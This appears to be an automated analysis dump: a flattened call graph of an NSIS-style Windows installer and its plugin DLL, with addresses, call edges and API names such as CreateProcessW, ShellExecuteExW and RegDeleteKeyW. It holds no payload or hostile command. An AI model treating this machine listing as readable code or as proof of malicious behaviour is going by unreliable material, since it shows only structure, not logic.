403608 4337->4342 4491 406297 lstrcpynW 4338->4491 4339->4325 4342->4328 4342->4390 4351 403643 4344->4351 4346 403811 4349 403895 ExitProcess 4346->4349 4350 403819 GetCurrentProcess OpenProcessToken 4346->4350 4347 4036f1 4501 4058fd 4347->4501 4356 403831 LookupPrivilegeValueW AdjustTokenPrivileges 4350->4356 4357 403865 4350->4357 4354 4036a1 4351->4354 4355 403707 4351->4355 4358 405c74 18 API calls 4354->4358 4359 405868 5 API calls 4355->4359 4356->4357 4360 406671 5 API calls 4357->4360 4361 4036ad 4358->4361 4362 40370c lstrcatW 4359->4362 4363 40386c 4360->4363 4361->4390 4492 406297 lstrcpynW 4361->4492 4364 403728 lstrcatW lstrcmpiW 4362->4364 4365 40371d lstrcatW 4362->4365 4366 403881 ExitWindowsEx 4363->4366 4369 40388e 4363->4369 4368 403744 4364->4368 4364->4390 4365->4364 4366->4349 4366->4369 4372 403750 4368->4372 4373 403749 4368->4373 4510 40140b 4369->4510 4371 4036bc 4493 406297 lstrcpynW 4371->4493 4376 40584b 2 API calls 4372->4376 4375 4057ce 4 API calls 4373->4375 4378 40374e 4375->4378 4379 403755 SetCurrentDirectoryW 4376->4379 4435 403987 4377->4435 4378->4379 4380 403770 4379->4380 4381 403765 4379->4381 4506 406297 lstrcpynW 4380->4506 4505 406297 lstrcpynW 4381->4505 4384 4062b9 17 API calls 4385 4037af DeleteFileW 4384->4385 4386 4037bc CopyFileW 4385->4386 4392 40377e 4385->4392 4386->4392 4387 403805 4388 40605d 36 API calls 4387->4388 4388->4390 4389 40605d 36 API calls 4389->4392 4494 4038ad 4390->4494 4391 4062b9 17 API calls 4391->4392 4392->4384 4392->4387 4392->4389 4392->4391 4394 4037f0 CloseHandle 4392->4394 4507 405880 CreateProcessW 4392->4507 4394->4392 4395->4320 4396->4322 4398 40652b 5 API calls 4397->4398 4400 403347 4398->4400 4399 403351 4399->4327 4400->4399 4401 405b6c 3 API calls 4400->4401 4402 403359 4401->4402 4403 40584b 2 API calls 4402->4403 4404 40335f 4403->4404 4513 405dbc 4404->4513 4517 405d8d GetFileAttributesW CreateFileW 4407->4517 4409 402f1d 4427 402f2d 4409->4427 4518 406297 lstrcpynW 4409->4518 4411 402f43 4412 405bb8 2 API calls 4411->4412 4413 402f49 4412->4413 4519 406297 lstrcpynW 4413->4519 4415 402f54 GetFileSize 4416 403050 4415->4416 4432 402f6b 4415->4432 4520 402e79 4416->4520 4418 403059 4420 403089 GlobalAlloc 4418->4420 4418->4427 4532 403324 SetFilePointer 4418->4532 4419 40330e ReadFile 4419->4432 4531 403324 SetFilePointer 4420->4531 4422 4030bc 4426 402e79 6 API calls 4422->4426 4424 403072 4428 40330e ReadFile 4424->4428 4425 4030a4 4429 403116 31 API calls 4425->4429 4426->4427 4427->4334 4430 40307d 4428->4430 4433 4030b0 4429->4433 4430->4420 4430->4427 4431 402e79 6 API calls 4431->4432 4432->4416 4432->4419 4432->4422 4432->4427 4432->4431 4433->4427 4433->4433 4434 4030ed SetFilePointer 4433->4434 4434->4427 4436 406671 5 API calls 4435->4436 4437 40399b 4436->4437 4438 4039a1 GetUserDefaultUILanguage 4437->4438 4439 4039b3 4437->4439 4537 4061de wsprintfW 4438->4537 4440 406165 3 API calls 4439->4440 4442 4039e3 4440->4442 4444 403a02 lstrcatW 4442->4444 4445 406165 3 API calls 4442->4445 4443 4039b1 4538 403c5d 4443->4538 4444->4443 4445->4444 4448 405c74 18 API calls 4449 403a34 4448->4449 4450 403ac8 4449->4450 4452 406165 3 API calls 4449->4452 4451 405c74 18 API calls 4450->4451 4453 403ace 4451->4453 4454 403a66 4452->4454 4455 403ade LoadImageW 4453->4455 4456 4062b9 17 API calls 4453->4456 4454->4450 4462 403a87 lstrlenW 4454->4462 4463 405b99 CharNextW 4454->4463 4457 403b84 4455->4457 4458 403b05 RegisterClassW 4455->4458 4456->4455 4461 40140b 2 API calls 4457->4461 4459 403b8e 4458->4459 4460 403b3b SystemParametersInfoW CreateWindowExW 4458->4460 4459->4390 4460->4457 4466 403b8a 4461->4466 4464 403a95 lstrcmpiW 4462->4464 4465 403abb 4462->4465 4467 403a84 4463->4467 4464->4465 4468 403aa5 GetFileAttributesW 4464->4468 4469 405b6c 3 API calls 4465->4469 4466->4459 4471 403c5d 18 API calls 4466->4471 4467->4462 4470 403ab1 4468->4470 4472 403ac1 4469->4472 4470->4465 4473 405bb8 2 API calls 4470->4473 4474 403b9b 4471->4474 4546 406297 lstrcpynW 4472->4546 4473->4465 4476 403ba7 ShowWindow 4474->4476 4477 403c2a 4474->4477 4479 406601 3 API calls 4476->4479 4547 4053d2 OleInitialize 4477->4547 4481 403bbf 4479->4481 4480 403c30 4482 403c34 4480->4482 4483 403c4c 4480->4483 4484 403bcd GetClassInfoW 4481->4484 4488 406601 3 API calls 4481->4488 4482->4459 4490 40140b 2 API calls 4482->4490 4487 40140b 2 API calls 4483->4487 4485 403be1 GetClassInfoW RegisterClassW 4484->4485 4486 403bf7 DialogBoxParamW 4484->4486 4485->4486 4489 40140b 2 API calls 4486->4489 4487->4459 4488->4484 4489->4459 4490->4459 4491->4339 4492->4371 4493->4377 4495 4038c5 4494->4495 4496 4038b7 CloseHandle 4494->4496 4565 4038f2 4495->4565 4496->4495 4499 4059a9 67 API calls 4500 4036e0 OleUninitialize 4499->4500 4500->4346 4500->4347 4502 405912 4501->4502 4503 4036ff ExitProcess 4502->4503 4504 405926 MessageBoxIndirectW 4502->4504 4504->4503 4505->4380 4506->4392 4508 4058b3 CloseHandle 4507->4508 4509 4058bf 4507->4509 4508->4509 4509->4392 4511 401389 2 API calls 4510->4511 4512 401420 4511->4512 4512->4349 4514 405dc9 GetTickCount GetTempFileNameW 4513->4514 4515 405dff 4514->4515 4516 40336a 4514->4516 4515->4514 4515->4516 4516->4327 4517->4409 4518->4411 4519->4415 4521 402e82 4520->4521 4522 402e9a 4520->4522 4525 402e92 4521->4525 4526 402e8b DestroyWindow 4521->4526 4523 402ea2 4522->4523 4524 402eaa GetTickCount 4522->4524 4533 4066ad 4523->4533 4528 402eb8 CreateDialogParamW ShowWindow 4524->4528 4529 402edb 4524->4529 4525->4418 4526->4525 4528->4529 4529->4418 4531->4425 4532->4424 4534 4066ca PeekMessageW 4533->4534 4535 4066c0 DispatchMessageW 4534->4535 4536 402ea8 4534->4536 4535->4534 4536->4418 4537->4443 4539 403c71 4538->4539 4554 4061de wsprintfW 4539->4554 4541 403ce2 4555 403d16 4541->4555 4543 403a12 4543->4448 4544 403ce7 4544->4543 4545 4062b9 17 API calls 4544->4545 4545->4544 4546->4450 4558 40425a 4547->4558 4549 40541c 4550 40425a SendMessageW 4549->4550 4552 40542e OleUninitialize 4550->4552 4551 4053f5 4551->4549 4561 401389 4551->4561 4552->4480 4554->4541 4556 4062b9 17 API calls 4555->4556 4557 403d24 SetWindowTextW 4556->4557 4557->4544 4559 404272 4558->4559 4560 404263 SendMessageW 4558->4560 4559->4551 4560->4559 4563 401390 4561->4563 4562 4013fe 4562->4551 4563->4562 4564 4013cb MulDiv SendMessageW 4563->4564 4564->4563 4566 403900 4565->4566 4567 4038ca 4566->4567 4568 403905 FreeLibrary GlobalFree 4566->4568 4567->4499 4568->4567 4568->4568 4569 40176f 4570 402c41 17 API calls 4569->4570 4571 401776 4570->4571 4572 401796 4571->4572 4573 40179e 4571->4573 4608 406297 lstrcpynW 4572->4608 4609 406297 lstrcpynW 4573->4609 4576 40179c 4580 40652b 5 API calls 4576->4580 4577 4017a9 4578 405b6c 3 API calls 4577->4578 4579 4017af lstrcatW 4578->4579 4579->4576 4596 4017bb 4580->4596 4581 4065da 2 API calls 4581->4596 4582 405d68 2 API calls 4582->4596 4584 4017cd CompareFileTime 4584->4596 4585 40188d 4587 4052ff 24 API calls 4585->4587 4586 401864 4588 4052ff 24 API calls 4586->4588 4606 401879 4586->4606 4589 401897 4587->4589 4588->4606 4590 403116 31 API calls 4589->4590 4591 4018aa 4590->4591 4592 4018be SetFileTime 4591->4592 4593 4018d0 CloseHandle 4591->4593 4592->4593 4595 4018e1 4593->4595 4593->4606 4594 4062b9 17 API calls 4594->4596 4597 4018e6 4595->4597 4598 4018f9 4595->4598 4596->4581 4596->4582 4596->4584 4596->4585 4596->4586 4596->4594 4599 406297 lstrcpynW 4596->4599 4602 4058fd MessageBoxIndirectW 4596->4602 4607 405d8d GetFileAttributesW CreateFileW 4596->4607 4600 4062b9 17 API calls 4597->4600 4601 4062b9 17 API calls 4598->4601 4599->4596 4603 4018ee lstrcatW 4600->4603 4604 401901 4601->4604 4602->4596 4603->4604 4605 4058fd MessageBoxIndirectW 4604->4605 4605->4606 4607->4596 4608->4576 4609->4577 5208 4027ef 5209 402a70 5208->5209 5210 4027f6 5208->5210 5211 402c1f 17 API calls 5210->5211 5212 4027fd 5211->5212 5213 40280c SetFilePointer 5212->5213 5213->5209 5214 40281c 5213->5214 5216 4061de wsprintfW 5214->5216 5216->5209 5217 401a72 5218 402c1f 17 API calls 5217->5218 5219 401a7b 5218->5219 5220 402c1f 17 API calls 5219->5220 5221 401a20 5220->5221 4798 405273 4799 405283 4798->4799 4800 405297 4798->4800 4802 4052e0 4799->4802 4803 405289 4799->4803 4801 40529f IsWindowVisible 4800->4801 4810 4052bf 4800->4810 4801->4802 4804 4052ac 4801->4804 4805 4052e5 CallWindowProcW 4802->4805 4806 40425a SendMessageW 4803->4806 4812 404bc9 SendMessageW 4804->4812 4808 405293 4805->4808 4806->4808 4810->4805 4817 404c49 4810->4817 4813 404c28 SendMessageW 4812->4813 4814 404bec GetMessagePos ScreenToClient SendMessageW 4812->4814 4815 404c20 4813->4815 4814->4815 4816 404c25 4814->4816 4815->4810 4816->4813 4826 406297 lstrcpynW 4817->4826 4819 404c5c 4827 4061de wsprintfW 4819->4827 4821 404c66 4822 40140b 2 API calls 4821->4822 4823 404c6f 4822->4823 4828 406297 lstrcpynW 4823->4828 4825 404c76 4825->4802 4826->4819 4827->4821 4828->4825 5222 401cf3 5223 402c1f 17 API calls 5222->5223 5224 401cf9 IsWindow 5223->5224 5225 401a20 5224->5225 5226 401573 5227 401583 ShowWindow 5226->5227 5228 40158c 5226->5228 5227->5228 5229 402ac5 5228->5229 5230 40159a ShowWindow 5228->5230 5230->5229 5231 402df3 5232 402e05 SetTimer 5231->5232 5233 402e1e 5231->5233 5232->5233 5234 402e73 5233->5234 5235 402e38 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5233->5235 5235->5234 5236 4014f5 SetForegroundWindow 5237 402ac5 5236->5237 5238 402576 5239 402c41 17 API calls 5238->5239 5240 40257d 5239->5240 5243 405d8d GetFileAttributesW CreateFileW 5240->5243 5242 402589 5243->5242 5244 401b77 5245 401b84 5244->5245 5246 401bc8 5244->5246 5251 401b9b 5245->5251 5254 401c0d 5245->5254 5247 401bf2 GlobalAlloc 5246->5247 5248 401bcd 5246->5248 5250 4062b9 17 API calls 5247->5250 5260 4022f7 5248->5260 5265 406297 lstrcpynW 5248->5265 5249 4062b9 17 API calls 5253 4022f1 5249->5253 5250->5254 5263 406297 lstrcpynW 5251->5263 5258 4058fd MessageBoxIndirectW 5253->5258 5254->5249 5254->5260 5256 401bdf GlobalFree 5256->5260 5257 401baa 5264 406297 lstrcpynW 5257->5264 5258->5260 5261 401bb9 5266 406297 lstrcpynW 5261->5266 5263->5257 5264->5261 5265->5256 5266->5260 4929 4024f8 4930 402c81 17 API calls 4929->4930 4931 402502 4930->4931 4932 402c1f 17 API calls 4931->4932 4933 40250b 4932->4933 4934 402533 RegEnumValueW 4933->4934 4935 402527 RegEnumKeyW 4933->4935 4938 40288b 4933->4938 4936 40254f RegCloseKey 4934->4936 4937 402548 4934->4937 4935->4936 4936->4938 4937->4936 5267 6fbb2301 5268 6fbb236b 5267->5268 5269 6fbb2376 GlobalAlloc 5268->5269 5270 6fbb2395 5268->5270 5269->5268 4940 404c7b GetDlgItem GetDlgItem 4941 404ccd 7 API calls 4940->4941 4948 404ee6 4940->4948 4942 404d70 DeleteObject 4941->4942 4943 404d63 SendMessageW 4941->4943 4944 404d79 4942->4944 4943->4942 4945 404db0 4944->4945 4947 404d88 4944->4947 4950 40420e 18 API calls 4945->4950 4946 404fca 4951 405076 4946->4951 4958 40525e 4946->4958 4962 405023 SendMessageW 4946->4962 4952 4062b9 17 API calls 4947->4952 4948->4946 4949 404fab 4948->4949 4956 404f46 4948->4956 4949->4946 4959 404fbc SendMessageW 4949->4959 4957 404dc4 4950->4957 4953 405080 SendMessageW 4951->4953 4954 405088 4951->4954 4955 404d92 SendMessageW SendMessageW 4952->4955 4953->4954 4965 4050a1 4954->4965 4966 40509a ImageList_Destroy 4954->4966 4980 4050b1 4954->4980 4955->4944 4960 404bc9 5 API calls 4956->4960 4961 40420e 18 API calls 4957->4961 4963 404275 8 API calls 4958->4963 4959->4946 4987 404f57 4960->4987 4967 404dd2 4961->4967 4962->4958 4969 405038 SendMessageW 4962->4969 4964 40526c 4963->4964 4970 4050aa GlobalFree 4965->4970 4965->4980 4966->4965 4971 404ea7 GetWindowLongW SetWindowLongW 4967->4971 4979 404e22 SendMessageW 4967->4979 4982 404ea1 4967->4982 4983 404e5e SendMessageW 4967->4983 4984 404e6f SendMessageW 4967->4984 4968 405220 4968->4958 4974 405232 ShowWindow GetDlgItem ShowWindow 4968->4974 4972 40504b 4969->4972 4970->4980 4973 404ec0 4971->4973 4981 40505c SendMessageW 4972->4981 4975 404ec6 ShowWindow 4973->4975 4976 404ede 4973->4976 4974->4958 4996 404243 SendMessageW 4975->4996 4997 404243 SendMessageW 4976->4997 4979->4967 4980->4968 4985 404c49 4 API calls 4980->4985 4989 4050ec 4980->4989 4981->4951 4982->4971 4982->4973 4983->4967 4984->4967 4985->4989 4986 404ed9 4986->4958 4987->4949 4988 4051f6 InvalidateRect 4988->4968 4990 40520c 4988->4990 4991 40511a SendMessageW 4989->4991 4993 405130 4989->4993 4998 404b84 4990->4998 4991->4993 4992 405191 4995 4051a4 SendMessageW SendMessageW 4992->4995 4993->4988 4993->4992 4993->4995 4995->4993 4996->4986 4997->4948 5001 404abb 4998->5001 5000 404b99 5000->4968 5002 404ad4 5001->5002 5003 4062b9 17 API calls 5002->5003 5004 404b38 5003->5004 5005 4062b9 17 API calls 5004->5005 5006 404b43 5005->5006 5007 4062b9 17 API calls 5006->5007 5008 404b59 lstrlenW wsprintfW SetDlgItemTextW 5007->5008 5008->5000 5271 40167b 5272 402c41 17 API calls 5271->5272 5273 401682 5272->5273 5274 402c41 17 API calls 5273->5274 5275 40168b 5274->5275 5276 402c41 17 API calls 5275->5276 5277 401694 MoveFileW 5276->5277 5278 4016a7 5277->5278 5284 4016a0 5277->5284 5280 4065da 2 API calls 5278->5280 5282 402250 5278->5282 5279 401423 24 API calls 5279->5282 5281 4016b6 5280->5281 5281->5282 5283 40605d 36 API calls 5281->5283 5283->5284 5284->5279 5285 6fbb1000 5286 6fbb101b 5 API calls 5285->5286 5287 6fbb1019 5286->5287 5288 401e7d 5289 402c41 17 API calls 5288->5289 5290 401e83 5289->5290 5291 402c41 17 API calls 5290->5291 5292 401e8c 5291->5292 5293 402c41 17 API calls 5292->5293 5294 401e95 5293->5294 5295 402c41 17 API calls 5294->5295 5296 401e9e 5295->5296 5297 401423 24 API calls 5296->5297 5298 401ea5 5297->5298 5305 4058c3 ShellExecuteExW 5298->5305 5300 401ee7 5302 40288b 5300->5302 5306 406722 WaitForSingleObject 5300->5306 5303 401f01 CloseHandle 5303->5302 5305->5300 5307 40673c 5306->5307 5308 40674e GetExitCodeProcess 5307->5308 5309 4066ad 2 API calls 5307->5309 5308->5303 5310 406743 WaitForSingleObject 5309->5310 5310->5307 5311 40437e lstrlenW 5312 40439d 5311->5312 5313 40439f WideCharToMultiByte 5311->5313 5312->5313 5314 4046ff 5315 40472b 5314->5315 5316 40473c 5314->5316 5375 4058e1 GetDlgItemTextW 5315->5375 5318 404748 GetDlgItem 5316->5318 5324 4047a7 5316->5324 5320 40475c 5318->5320 5319 404736 5322 40652b 5 API calls 5319->5322 5323 404770 SetWindowTextW 5320->5323 5327 405c17 4 API calls 5320->5327 5321 40488b 5373 404a3a 5321->5373 5377 4058e1 GetDlgItemTextW 5321->5377 5322->5316 5328 40420e 18 API calls 5323->5328 5324->5321 5329 4062b9 17 API calls 5324->5329 5324->5373 5326 404275 8 API calls 5331 404a4e 5326->5331 5332 404766 5327->5332 5333 40478c 5328->5333 5334 40481b SHBrowseForFolderW 5329->5334 5330 4048bb 5335 405c74 18 API calls 5330->5335 5332->5323 5341 405b6c 3 API calls 5332->5341 5336 40420e 18 API calls 5333->5336 5334->5321 5337 404833 CoTaskMemFree 5334->5337 5338 4048c1 5335->5338 5339 40479a 5336->5339 5340 405b6c 3 API calls 5337->5340 5378 406297 lstrcpynW 5338->5378 5376 404243 SendMessageW 5339->5376 5343 404840 5340->5343 5341->5323 5346 404877 SetDlgItemTextW 5343->5346 5350 4062b9 17 API calls 5343->5350 5345 4047a0 5348 406671 5 API calls 5345->5348 5346->5321 5347 4048d8 5349 406671 5 API calls 5347->5349 5348->5324 5358 4048df 5349->5358 5351 40485f lstrcmpiW 5350->5351 5351->5346 5354 404870 lstrcatW 5351->5354 5352 404920 5379 406297 lstrcpynW 5352->5379 5354->5346 5355 404927 5356 405c17 4 API calls 5355->5356 5357 40492d GetDiskFreeSpaceW 5356->5357 5360 404951 MulDiv 5357->5360 5363 404978 5357->5363 5358->5352 5361 405bb8 2 API calls 5358->5361 5358->5363 5360->5363 5361->5358 5362 4049e9 5365 404a0c 5362->5365 5367 40140b 2 API calls 5362->5367 5363->5362 5364 404b84 20 API calls 5363->5364 5366 4049d6 5364->5366 5380 404230 EnableWindow 5365->5380 5369 4049eb SetDlgItemTextW 5366->5369 5370 4049db 5366->5370 5367->5365 5369->5362 5372 404abb 20 API calls 5370->5372 5371 404a28 5371->5373 5374 404658 SendMessageW 5371->5374 5372->5362 5373->5326 5374->5373 5375->5319 5376->5345 5377->5330 5378->5347 5379->5355 5380->5371 5381 4019ff 5382 402c41 17 API calls 5381->5382 5383 401a06 5382->5383 5384 402c41 17 API calls 5383->5384 5385 401a0f 5384->5385 5386 401a16 lstrcmpiW 5385->5386 5387 401a28 lstrcmpW 5385->5387 5388 401a1c 5386->5388 5387->5388 5389 401000 5390 401037 BeginPaint GetClientRect 5389->5390 5391 40100c DefWindowProcW 5389->5391 5392 4010f3 5390->5392 5394 401179 5391->5394 5395 401073 CreateBrushIndirect FillRect DeleteObject 5392->5395 5396 4010fc 5392->5396 5395->5392 5397 401102 CreateFontIndirectW 5396->5397 5398 401167 EndPaint 5396->5398 5397->5398 5399 401112 6 API calls 5397->5399 5398->5394 5399->5398 5400 401503 5401 40150b 5400->5401 5403 40151e 5400->5403 5402 402c1f 17 API calls 5401->5402 5402->5403 4277 402484 4288 402c81 4277->4288 4280 402c41 17 API calls 4281 402497 4280->4281 4282 4024a2 RegQueryValueExW 4281->4282 4283 40288b 4281->4283 4284 4024c2 4282->4284 4287 4024c8 RegCloseKey 4282->4287 4284->4287 4293 4061de wsprintfW 4284->4293 4287->4283 4289 402c41 17 API calls 4288->4289 4290 402c98 4289->4290 4291 406104 RegOpenKeyExW 4290->4291 4292 40248e 4291->4292 4292->4280 4293->4287 5404 402104 5405 402c41 17 API calls 5404->5405 5406 40210b 5405->5406 5407 402c41 17 API calls 5406->5407 5408 402115 5407->5408 5409 402c41 17 API calls 5408->5409 5410 40211f 5409->5410 5411 402c41 17 API calls 5410->5411 5412 402129 5411->5412 5413 402c41 17 API calls 5412->5413 5415 402133 5413->5415 5414 402172 CoCreateInstance 5419 402191 5414->5419 5415->5414 5416 402c41 17 API calls 5415->5416 5416->5414 5417 401423 24 API calls 5418 402250 5417->5418 5419->5417 5419->5418 5420 401f06 5421 402c41 17 API calls 5420->5421 5422 401f0c 5421->5422 5423 4052ff 24 API calls 5422->5423 5424 401f16 5423->5424 5425 405880 2 API calls 5424->5425 5426 401f1c 5425->5426 5427 401f3f CloseHandle 5426->5427 5428 406722 5 API calls 5426->5428 5431 40288b 5426->5431 5427->5431 5430 401f31 5428->5430 5430->5427 5433 4061de wsprintfW 5430->5433 5433->5427 5434 6fbb1671 5435 6fbb1516 GlobalFree 5434->5435 5437 6fbb1689 5435->5437 5436 6fbb16cf GlobalFree 5437->5436 5438 6fbb16a4 5437->5438 5439 6fbb16bb VirtualFree 5437->5439 5438->5436 5439->5436 5440 40190c 5441 401943 5440->5441 5442 402c41 17 API calls 5441->5442 5443 401948 5442->5443 5444 4059a9 67 API calls 5443->5444 5445 401951 5444->5445 5446 40230c 5447 402314 5446->5447 5448 40231a 5446->5448 5449 402c41 17 API calls 5447->5449 5450 402c41 17 API calls 5448->5450 5452 402328 5448->5452 5449->5448 5450->5452 5451 402336 5454 402c41 17 API calls 5451->5454 5452->5451 5453 402c41 17 API calls 5452->5453 5453->5451 5455 40233f WritePrivateProfileStringW 5454->5455 5456 401f8c 5457 402c41 17 API calls 5456->5457 5458 401f93 5457->5458 5459 406671 5 API calls 5458->5459 5460 401fa2 5459->5460 5461 401fbe GlobalAlloc 5460->5461 5466 402026 5460->5466 5462 401fd2 5461->5462 5461->5466 5463 406671 5 API calls 5462->5463 5464 401fd9 5463->5464 5465 406671 5 API calls 5464->5465 5467 401fe3 5465->5467 5467->5466 5471 4061de wsprintfW 5467->5471 5469 402018 5472 4061de wsprintfW 5469->5472 5471->5469 5472->5466 5473 40238e 5474 4023c1 5473->5474 5475 402396 5473->5475 5477 402c41 17 API calls 5474->5477 5476 402c81 17 API calls 5475->5476 5478 40239d 5476->5478 5479 4023c8 5477->5479 5481 402c41 17 API calls 5478->5481 5483 4023d5 5478->5483 5484 402cff 5479->5484 5482 4023ae RegDeleteValueW RegCloseKey 5481->5482 5482->5483 5485 402d13 5484->5485 5486 402d0c 5484->5486 5485->5486 5488 402d44 5485->5488 5486->5483 5489 406104 RegOpenKeyExW 5488->5489 5492 402d72 5489->5492 5490 402dc3 5490->5486 5491 402d98 RegEnumKeyW 5491->5492 5493 402daf RegCloseKey 5491->5493 5492->5490 5492->5491 5492->5493 5494 402dd0 RegCloseKey 5492->5494 5496 402d44 6 API calls 5492->5496 5495 406671 5 API calls 5493->5495 5494->5490 5497 402dbf 5495->5497 5496->5492 5497->5490 5498 402de0 RegDeleteKeyW 5497->5498 5498->5490 5499 40190f 5500 402c41 17 API calls 5499->5500 5501 401916 5500->5501 5502 4058fd MessageBoxIndirectW 5501->5502 5503 40191f 5502->5503 5504 401491 5505 4052ff 24 API calls 5504->5505 5506 401498 5505->5506 5507 401d14 5508 402c1f 17 API calls 5507->5508 5509 401d1b 5508->5509 5510 402c1f 17 API calls 5509->5510 5511 401d27 GetDlgItem 5510->5511 5512 402592 5511->5512 5513 402598 5514 4025c7 5513->5514 5515 4025ac 5513->5515 5517 4025fb 5514->5517 5518 4025cc 5514->5518 5516 402c1f 17 API calls 5515->5516 5523 4025b3 5516->5523 5519 402c41 17 API calls 5517->5519 5520 402c41 17 API calls 5518->5520 5521 402602 lstrlenW 5519->5521 5522 4025d3 WideCharToMultiByte lstrlenA 5520->5522 5521->5523 5522->5523 5524 402645 5523->5524 5525 40262f 5523->5525 5527 405e6e 5 API calls 5523->5527 5525->5524 5526 405e3f WriteFile 5525->5526 5526->5524 5527->5525 5528 6fbb10e1 5537 6fbb1111 5528->5537 5529 6fbb11d8 GlobalFree 5530 6fbb12ba 2 API calls 5530->5537 5531 6fbb11d3 5531->5529 5532 6fbb1164 GlobalAlloc 5532->5537 5533 6fbb11f8 GlobalFree 5533->5537 5534 6fbb1272 2 API calls 5536 6fbb11c4 GlobalFree 5534->5536 5535 6fbb12e1 lstrcpyW 5535->5537 5536->5537 5537->5529 5537->5530 5537->5531 5537->5532 5537->5533 5537->5534 5537->5535 5537->5536 5538 40149e 5539 4022f7 5538->5539 5540 4014ac PostQuitMessage 5538->5540 5540->5539 5541 401c1f 5542 402c1f 17 API calls 5541->5542 5543 401c26 5542->5543 5544 402c1f 17 API calls 5543->5544 5545 401c33 5544->5545 5546 401c48 5545->5546 5547 402c41 17 API calls 5545->5547 5548 401c58 5546->5548 5549 402c41 17 API calls 5546->5549 5547->5546 5550 401c63 5548->5550 5551 401caf 5548->5551 5549->5548 5553 402c1f 17 API calls 5550->5553 5552 402c41 17 API calls 5551->5552 5555 401cb4 5552->5555 5554 401c68 5553->5554 5556 402c1f 17 API calls 5554->5556 5557 402c41 17 API calls 5555->5557 5558 401c74 5556->5558 5559 401cbd FindWindowExW 5557->5559 5560 401c81 SendMessageTimeoutW 5558->5560 5561 401c9f SendMessageW 5558->5561 5562 401cdf 5559->5562 5560->5562 5561->5562 5563 402aa0 SendMessageW 5564 402ac5 5563->5564 5565 402aba InvalidateRect 5563->5565 5565->5564 5566 402821 5567 402827 5566->5567 5568 402ac5 5567->5568 5569 40282f FindClose 5567->5569 5569->5568 4221 4015a3 4222 402c41 17 API calls 4221->4222 4223 4015aa SetFileAttributesW 4222->4223 4224 4015bc 4223->4224 5570 6fbb16d8 5571 6fbb1707 5570->5571 5572 6fbb1b63 22 API calls 5571->5572 5573 6fbb170e 5572->5573 5574 6fbb1721 5573->5574 5575 6fbb1715 5573->5575 5577 6fbb172b 5574->5577 5578 6fbb1748 5574->5578 5576 6fbb1272 2 API calls 5575->5576 5581 6fbb171f 5576->5581 5582 6fbb153d 3 API calls 5577->5582 5579 6fbb174e 5578->5579 5580 6fbb1772 5578->5580 5583 6fbb15b4 3 API calls 5579->5583 5584 6fbb153d 3 API calls 5580->5584 5585 6fbb1730 5582->5585 5586 6fbb1753 5583->5586 5584->5581 5587 6fbb15b4 3 API calls 5585->5587 5588 6fbb1272 2 API calls 5586->5588 5589 6fbb1736 5587->5589 5590 6fbb1759 GlobalFree 5588->5590 5591 6fbb1272 2 API calls 5589->5591 5590->5581 5592 6fbb176d GlobalFree 5590->5592 5593 6fbb173c GlobalFree 5591->5593 5592->5581 5593->5581 5594 6fbb1058 5595 6fbb1074 5594->5595 5596 6fbb10dd 5595->5596 5597 6fbb1516 GlobalFree 5595->5597 5598 6fbb1092 5595->5598 5597->5598 5599 6fbb1516 GlobalFree 5598->5599 5600 6fbb10a2 5599->5600 5601 6fbb10a9 GlobalSize 5600->5601 5602 6fbb10b2 5600->5602 5601->5602 5603 6fbb10c7 5602->5603 5604 6fbb10b6 GlobalAlloc 5602->5604 5606 6fbb10d2 GlobalFree 5603->5606 5605 6fbb153d 3 API calls 5604->5605 5605->5603 5606->5596 5607 6fbb18dd 5608 6fbb1900 5607->5608 5609 6fbb1935 GlobalFree 5608->5609 5610 6fbb1947 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5608->5610 5609->5610 5611 6fbb1272 2 API calls 5610->5611 5612 6fbb1ad2 GlobalFree GlobalFree 5611->5612 5613 4029a8 5614 402c1f 17 API calls 5613->5614 5615 4029ae 5614->5615 5616 4029d5 5615->5616 5617 4029ee 5615->5617 5625 40288b 5615->5625 5622 4029da 5616->5622 5626 4029eb 5616->5626 5618 402a08 5617->5618 5619 4029f8 5617->5619 5621 4062b9 17 API calls 5618->5621 5620 402c1f 17 API calls 5619->5620 5620->5626 5621->5626 5627 406297 lstrcpynW 5622->5627 5626->5625 5628 4061de wsprintfW 5626->5628 5627->5625 5628->5625 5629 4028ad 5630 402c41 17 API calls 5629->5630 5632 4028bb 5630->5632 5631 4028d1 5634 405d68 2 API calls 5631->5634 5632->5631 5633 402c41 17 API calls 5632->5633 5633->5631 5635 4028d7 5634->5635 5657 405d8d GetFileAttributesW CreateFileW 5635->5657 5637 4028e4 5638 4028f0 GlobalAlloc 5637->5638 5639 402987 5637->5639 5640 402909 5638->5640 5641 40297e CloseHandle 5638->5641 5642 4029a2 5639->5642 5643 40298f DeleteFileW 5639->5643 5658 403324 SetFilePointer 5640->5658 5641->5639 5643->5642 5645 40290f 5646 40330e ReadFile 5645->5646 5647 402918 GlobalAlloc 5646->5647 5648 402928 5647->5648 5649 40295c 5647->5649 5650 403116 31 API calls 5648->5650 5651 405e3f WriteFile 5649->5651 5656 402935 5650->5656 5652 402968 GlobalFree 5651->5652 5653 403116 31 API calls 5652->5653 5654 40297b 5653->5654 5654->5641 5655 402953 GlobalFree 5655->5649 5656->5655 5657->5637 5658->5645 5659 401a30 5660 402c41 17 API calls 5659->5660 5661 401a39 ExpandEnvironmentStringsW 5660->5661 5662 401a4d 5661->5662 5664 401a60 5661->5664 5663 401a52 lstrcmpW 5662->5663 5662->5664 5663->5664 4610 402032 4611 402044 4610->4611 4612 4020f6 4610->4612 4613 402c41 17 API calls 4611->4613 4614 401423 24 API calls 4612->4614 4615 40204b 4613->4615 4620 402250 4614->4620 4616 402c41 17 API calls 4615->4616 4617 402054 4616->4617 4618 40206a LoadLibraryExW 4617->4618 4619 40205c GetModuleHandleW 4617->4619 4618->4612 4621 40207b 4618->4621 4619->4618 4619->4621 4633 4066e0 WideCharToMultiByte 4621->4633 4624 4020c5 4628 4052ff 24 API calls 4624->4628 4625 40208c 4626 402094 4625->4626 4627 4020ab 4625->4627 4629 401423 24 API calls 4626->4629 4636 6fbb177b 4627->4636 4630 40209c 4628->4630 4629->4630 4630->4620 4631 4020e8 FreeLibrary 4630->4631 4631->4620 4634 40670a GetProcAddress 4633->4634 4635 402086 4633->4635 4634->4635 4635->4624 4635->4625 4637 6fbb17ae 4636->4637 4678 6fbb1b63 4637->4678 4639 6fbb17b5 4640 6fbb18da 4639->4640 4641 6fbb17cd 4639->4641 4642 6fbb17c6 4639->4642 4640->4630 4712 6fbb2398 4641->4712 4728 6fbb2356 4642->4728 4647 6fbb1813 4741 6fbb256d 4647->4741 